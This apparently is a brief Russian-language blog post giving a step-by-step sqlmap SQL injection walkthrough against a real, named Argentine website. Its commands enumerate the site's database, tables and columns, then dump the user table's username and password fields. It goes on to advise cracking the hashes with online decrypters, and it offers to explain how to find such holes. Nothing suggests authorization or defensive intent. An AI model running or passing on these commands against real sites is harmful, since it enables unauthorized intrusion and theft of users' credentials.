sqlmap инъекции



1 запускаем БТ открываем терминал и пишем cd /pentest/web/scanners/sqlmap


2 собственно нам нужно узнать имя БД пишем python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 --dbs смотрим внимательно на строку ниже в терминале databases там написано junincc_junincc вот берем это имя и далее


3 выводим таблицу БД python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 -D junincc_junincc --tables


4 выводим колонки таблицы python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 -D junincc_junincc -T usuarios --columns


5 выводим информацию python sqlmap.py -u http:www.junincc.com.ar/noticia.php?id=1 -D junincc_junincc -T usuarios -C clave,usuario --dump

6 жмем Y ждем


7 через время у вас будет лог и хэшь - расшифровать хешь в онлайне к примеру  у меня на вкладке онлаин расшифровщики  ) удачи LoRD HG


дополнительно нужно ли рассказывать как найти такую брешь ??
в коменты плиз

Комментариев нет:

Отправить комментарий